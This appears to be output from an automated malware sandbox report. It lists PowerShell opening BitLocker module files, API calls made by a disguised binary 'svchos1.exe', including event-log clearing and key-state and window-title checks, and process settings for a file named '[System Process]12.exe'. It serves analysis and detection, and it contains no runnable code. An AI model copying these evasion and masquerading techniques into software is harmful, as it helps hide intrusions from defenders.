Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00272430 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	28_2_00272430
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002996BF SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	28_2_002996BF
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EE704 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_002EE704
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EE704 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_002EE704
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EE704 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_002EE704
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002A9927 IsWindowVisible,IsIconic,	28_2_002A9927
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EEA04 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	28_2_002EEA04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EFB54 IsIconic,PostMessageW,	28_2_002EFB54
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EDC75 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	28_2_002EDC75
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002AED6C SetForegroundWindow,IsIconic,	28_2_002AED6C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002AEE10 IsIconic,	28_2_002AEE10
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002EEF8F IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,	28_2_002EEF8F
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0384D260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,	28_2_0384D260
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_00272430 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	33_2_00272430
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_002996BF SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	33_2_002996BF
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0315D260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,	33_2_0315D260

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0383E550 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

28_2_0383E550

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_00287D24 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

28_2_00287D24

Source: C:\Users\user\Desktop\[System Process]12.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
